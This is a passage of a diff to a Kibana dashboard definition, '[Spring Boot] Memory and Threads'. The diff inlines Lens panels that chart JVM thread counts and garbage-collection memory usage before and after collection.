"indexpattern-datasource-layer-31ad067d-6820-43dc-a6fd-7a32a6a121f5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8a86b358-6960-40ef-91ed-05c2c2e7c40f", + "type": "index-pattern" + } + ] + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "gridData": { + "h": 15, + "i": "12e70c57-6059-400c-974f-b69423d435e9", + "w": 24, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "12e70c57-6059-400c-974f-b69423d435e9", - "w": 24, - "x": 0, - "y": 0 - }, - "panelIndex": "12e70c57-6059-400c-974f-b69423d435e9", - "panelRefName": "panel_12e70c57-6059-400c-974f-b69423d435e9", - "type": "lens", - "version": "8.1.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 10, - "i": "eb0fc5f9-1c7d-48bc-8098-ba58f9962dee", - "w": 24, - "x": 24, - "y": 0 - }, - "panelIndex": "eb0fc5f9-1c7d-48bc-8098-ba58f9962dee", - "panelRefName": "panel_eb0fc5f9-1c7d-48bc-8098-ba58f9962dee", - "title": "Total threads [Metrics Spring Boot]", - "type": "lens", - "version": "8.1.0" + "panelIndex": "12e70c57-6059-400c-974f-b69423d435e9", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "760bf001-a3ae-46e6-a366-ab2c9c777cfc": { + "columnOrder": [ + "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39", + "bd774bf7-35bf-4dd7-a647-897d8b5945df" + ], + "columns": { + "bd774bf7-35bf-4dd7-a647-897d8b5945df": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Threads", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } + }, + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "spring_boot.threading.threads.started" + }, + "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "61418bc6-4106-4f91-81ea-1e1071b7c9bb", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.threading" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.threading" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "bd774bf7-35bf-4dd7-a647-897d8b5945df" + ], + "layerId": "760bf001-a3ae-46e6-a366-ab2c9c777cfc", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39" + } + ], + "legend": { + "isInside": false, + "isVisible": true, + "legendSize": "auto", + "maxLines": 1, + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Total Threads" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "f3782cac-5b20-413c-a88d-cb01ebee5772", - "w": 24, - "x": 0, - "y": 15 - }, - "panelIndex": "f3782cac-5b20-413c-a88d-cb01ebee5772", - "panelRefName": "panel_f3782cac-5b20-413c-a88d-cb01ebee5772", - "type": "lens", - "version": "8.1.0" + "title": "Threads [Metrics Spring Boot]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-760bf001-a3ae-46e6-a366-ab2c9c777cfc", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "61418bc6-4106-4f91-81ea-1e1071b7c9bb", + "type": "index-pattern" + } + ] + } + }, + "gridData": { + "h": 10, + "i": "eb0fc5f9-1c7d-48bc-8098-ba58f9962dee", + "w": 24, + "x": 24, + "y": 0 + }, + "panelIndex": "eb0fc5f9-1c7d-48bc-8098-ba58f9962dee", + "title": "Total threads [Metrics Spring Boot]", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e937f0c4-f880-4837-9315-69d043a3f6b1": { + "columnOrder": [ + "94f7e582-69e9-4fe4-9111-75aaa6a3d470", + "01e713a3-bda9-4e10-b460-988900367abf", + "df8aa04a-8859-48a8-8624-e204eb09ad23", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X0", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X1", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X2", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X3", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X4", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X5", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X6", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X7", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X8", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X9", + "df8aa04a-8859-48a8-8624-e204eb09ad23X0", + "df8aa04a-8859-48a8-8624-e204eb09ad23X1", + "df8aa04a-8859-48a8-8624-e204eb09ad23X2", + "df8aa04a-8859-48a8-8624-e204eb09ad23X3", + "df8aa04a-8859-48a8-8624-e204eb09ad23X4", + "df8aa04a-8859-48a8-8624-e204eb09ad23X5", + "df8aa04a-8859-48a8-8624-e204eb09ad23X6", + "df8aa04a-8859-48a8-8624-e204eb09ad23X7", + "df8aa04a-8859-48a8-8624-e204eb09ad23X8", + "df8aa04a-8859-48a8-8624-e204eb09ad23X9" + ], + "columns": { + "01e713a3-bda9-4e10-b460-988900367abf": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Before", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } + }, + "formula": "sum(spring_boot.gc.last_info.memory_usage.before.code_cache.used)+sum(spring_boot.gc.last_info.memory_usage.before.compressed_class_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.metaspace.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_survivor_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_survivor_space.used)", + "isFormulaBroken": false + }, + "references": [ + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X9" + ], + "scale": "ratio" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Before", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.before.code_cache.used" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Before", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.before.compressed_class_space.used" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Before", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.before.metaspace.used" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X3": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Before", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.before.ps_eden_space.used" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X4": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Before", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.before.ps_old_gen.used" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X5": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Before", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.before.ps_survivor_space.used" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X6": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Before", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.before.g1_eden_space.used" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Before", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.before.g1_old_gen.used" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X8": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Before", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.before.g1_survivor_space.used" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X9": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Before", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + { + "args": [ + { + "args": [ + { + "args": [ + { + "args": [ + { + "args": [ + { + "args": [ + { + "args": [ + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X0", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X1" + ], + "name": "add", + "type": "function" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X2" + ], + "name": "add", + "type": "function" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X3" + ], + "name": "add", + "type": "function" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X4" + ], + "name": "add", + "type": "function" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X5" + ], + "name": "add", + "type": "function" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X6" + ], + "name": "add", + "type": "function" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X7" + ], + "name": "add", + "type": "function" + }, + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X8" + ], + "location": { + "max": 624, + "min": 0 + }, + "name": "add", + "text": "sum(spring_boot.gc.last_info.memory_usage.before.code_cache.used)+sum(spring_boot.gc.last_info.memory_usage.before.compressed_class_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.metaspace.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.before.ps_survivor_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.before.g1_survivor_space.used)", + "type": "function" + } + }, + "references": [ + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X0", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X1", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X2", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X3", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X4", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X5", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X6", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X7", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X8" + ], + "scale": "ratio" + }, + "94f7e582-69e9-4fe4-9111-75aaa6a3d470": { + "dataType": "string", + "isBucketed": true, + "label": "Top 5 values of spring_boot.gc.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" + }, + "orderDirection": "asc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "spring_boot.gc.name" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "After", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } + }, + "formula": "sum(spring_boot.gc.last_info.memory_usage.after.code_cache.used)+sum(spring_boot.gc.last_info.memory_usage.after.compressed_class_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.metaspace.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_survivor_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_survivor_space.used)", + "isFormulaBroken": false + }, + "references": [ + "df8aa04a-8859-48a8-8624-e204eb09ad23X9" + ], + "scale": "ratio" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of After", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.after.code_cache.used" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of After", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.after.compressed_class_space.used" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of After", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.after.metaspace.used" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X3": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of After", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.after.ps_eden_space.used" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X4": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of After", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.after.ps_old_gen.used" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X5": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of After", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.after.ps_survivor_space.used" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X6": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of After", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.after.g1_eden_space.used" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of After", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.after.g1_old_gen.used" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X8": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of After", + "operationType": "sum", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "spring_boot.gc.last_info.memory_usage.after.g1_survivor_space.used" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X9": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of After", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + { + "args": [ + { + "args": [ + { + "args": [ + { + "args": [ + { + "args": [ + { + "args": [ + { + "args": [ + "df8aa04a-8859-48a8-8624-e204eb09ad23X0", + "df8aa04a-8859-48a8-8624-e204eb09ad23X1" + ], + "name": "add", + "type": "function" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X2" + ], + "name": "add", + "type": "function" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X3" + ], + "name": "add", + "type": "function" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X4" + ], + "name": "add", + "type": "function" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X5" + ], + "name": "add", + "type": "function" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X6" + ], + "name": "add", + "type": "function" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X7" + ], + "name": "add", + "type": "function" + }, + "df8aa04a-8859-48a8-8624-e204eb09ad23X8" + ], + "location": { + "max": 615, + "min": 0 + }, + "name": "add", + "text": "sum(spring_boot.gc.last_info.memory_usage.after.code_cache.used)+sum(spring_boot.gc.last_info.memory_usage.after.compressed_class_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.metaspace.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.after.ps_survivor_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_eden_space.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_old_gen.used)+sum(spring_boot.gc.last_info.memory_usage.after.g1_survivor_space.used)", + "type": "function" + } + }, + "references": [ + "df8aa04a-8859-48a8-8624-e204eb09ad23X0", + "df8aa04a-8859-48a8-8624-e204eb09ad23X1", + "df8aa04a-8859-48a8-8624-e204eb09ad23X2", + "df8aa04a-8859-48a8-8624-e204eb09ad23X3", + "df8aa04a-8859-48a8-8624-e204eb09ad23X4", + "df8aa04a-8859-48a8-8624-e204eb09ad23X5", + "df8aa04a-8859-48a8-8624-e204eb09ad23X6", + "df8aa04a-8859-48a8-8624-e204eb09ad23X7", + "df8aa04a-8859-48a8-8624-e204eb09ad23X8" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "8aabc9bc-b40b-4f3c-b077-c4d19cd6b477", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.gc" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.gc" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "df8aa04a-8859-48a8-8624-e204eb09ad23", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7" + ], + "layerId": "e937f0c4-f880-4837-9315-69d043a3f6b1", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "94f7e582-69e9-4fe4-9111-75aaa6a3d470", + "xAccessor": "01e713a3-bda9-4e10-b460-988900367abf" + } + ], + "legend": { + "isVisible": true, + "legendSize": "xlarge", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "GC Memory Usage" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 10, - "i": "b55b6992-8179-4bf9-8e79-8354509a956e", - "w": 24, - "x": 24, - "y": 10 - }, - "panelIndex": "b55b6992-8179-4bf9-8e79-8354509a956e", - "panelRefName": "panel_b55b6992-8179-4bf9-8e79-8354509a956e", - "type": "lens", - "version": "8.1.0" + "title": "Memory usage after and before GC [Metrics Spring Boot]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-e937f0c4-f880-4837-9315-69d043a3f6b1", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8aabc9bc-b40b-4f3c-b077-c4d19cd6b477", + "type": "index-pattern" + } + ] + } + }, + "gridData": { + "h": 15, + "i": "f3782cac-5b20-413c-a88d-cb01ebee5772", + "w": 24, + "x": 0, + "y": 15 + }, + "panelIndex": "f3782cac-5b20-413c-a88d-cb01ebee5772", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "760bf001-a3ae-46e6-a366-ab2c9c777cfc": { + "columnOrder": [ + "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39", + "522f8dd4-2bc7-4665-9b33-83609e4f3125" + ], + "columns": { + "522f8dd4-2bc7-4665-9b33-83609e4f3125": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Current Threads", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } + }, + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "spring_boot.threading.threads.count" + }, + "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "6502fda4-d554-4b5d-8e8b-e6d3c873901b", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.threading" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.threading" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "522f8dd4-2bc7-4665-9b33-83609e4f3125" + ], + "layerId": "760bf001-a3ae-46e6-a366-ab2c9c777cfc", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Current Threads" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 10, - "i": "e7826ce5-e7f7-4f33-87c6-2f74fc9fa508", - "w": 24, - "x": 24, - "y": 20 - }, - "panelIndex": "e7826ce5-e7f7-4f33-87c6-2f74fc9fa508", - "panelRefName": "panel_e7826ce5-e7f7-4f33-87c6-2f74fc9fa508", - "type": "lens", - "version": "8.1.0" - } - ], - "timeRestore": false, - "title": "[Spring Boot] Memory and Threads", - "version": 1 - }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-11-02T08:23:19.946Z", - "id": "spring_boot-c89e1510-ca15-11ec-b4b1-b57f75afa7dd", - "migrationVersion": { - "dashboard": "8.7.0" - }, - "references": [ - { - "id": "spring_boot-e9033ff0-c9e9-11ec-b4b1-b57f75afa7dd", - "name": "12e70c57-6059-400c-974f-b69423d435e9:panel_12e70c57-6059-400c-974f-b69423d435e9", - "type": "lens" + "title": "Current threads [Metrics Spring Boot]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-760bf001-a3ae-46e6-a366-ab2c9c777cfc", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6502fda4-d554-4b5d-8e8b-e6d3c873901b", + "type": "index-pattern" + } + ] + } }, - { - "id": "spring_boot-4a05b120-c9ea-11ec-b4b1-b57f75afa7dd", - "name": "eb0fc5f9-1c7d-48bc-8098-ba58f9962dee:panel_eb0fc5f9-1c7d-48bc-8098-ba58f9962dee", - "type": "lens" + "gridData": { + "h": 10, + "i": "b55b6992-8179-4bf9-8e79-8354509a956e", + "w": 24, + "x": 24, + "y": 10 }, - { - "id": "spring_boot-fae00cb0-ca04-11ec-b4b1-b57f75afa7dd", - "name": "f3782cac-5b20-413c-a88d-cb01ebee5772:panel_f3782cac-5b20-413c-a88d-cb01ebee5772", - "type": "lens" + "panelIndex": "b55b6992-8179-4bf9-8e79-8354509a956e", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "760bf001-a3ae-46e6-a366-ab2c9c777cfc": { + "columnOrder": [ + "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39", + "c5fd0b8a-f8ac-4e5d-95ed-5ca552417e5c" + ], + "columns": { + "c5fd0b8a-f8ac-4e5d-95ed-5ca552417e5c": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Daemon Threads", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } + }, + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "spring_boot.threading.threads.daemon" + }, + "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "702499ca-434e-41d4-b9a1-1d0bb27b244a", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.threading" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.threading" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "c5fd0b8a-f8ac-4e5d-95ed-5ca552417e5c" + ], + "layerId": "760bf001-a3ae-46e6-a366-ab2c9c777cfc", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Daemon Threads" + } + }, + "title": "Daemon threads [Metrics Spring Boot]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-760bf001-a3ae-46e6-a366-ab2c9c777cfc", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "702499ca-434e-41d4-b9a1-1d0bb27b244a", + "type": "index-pattern" + } + ] + } }, - { - "id": "spring_boot-0f481600-ca11-11ec-b4b1-b57f75afa7dd", - "name": "b55b6992-8179-4bf9-8e79-8354509a956e:panel_b55b6992-8179-4bf9-8e79-8354509a956e", - "type": "lens" + "gridData": { + "h": 10, + "i": "e7826ce5-e7f7-4f33-87c6-2f74fc9fa508", + "w": 24, + "x": 24, + "y": 20 }, - { - "id": "spring_boot-12228630-ca11-11ec-b4b1-b57f75afa7dd", - "name": "e7826ce5-e7f7-4f33-87c6-2f74fc9fa508:panel_e7826ce5-e7f7-4f33-87c6-2f74fc9fa508", - "type": "lens" - } + "panelIndex": "e7826ce5-e7f7-4f33-87c6-2f74fc9fa508", + "type": "lens", + "version": "8.6.0" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Spring Boot] Memory and Threads", + "version": 1 + }, + "references": [ + { + "type": "index-pattern", + "name": "12e70c57-6059-400c-974f-b69423d435e9:indexpattern-datasource-layer-31ad067d-6820-43dc-a6fd-7a32a6a121f5", + 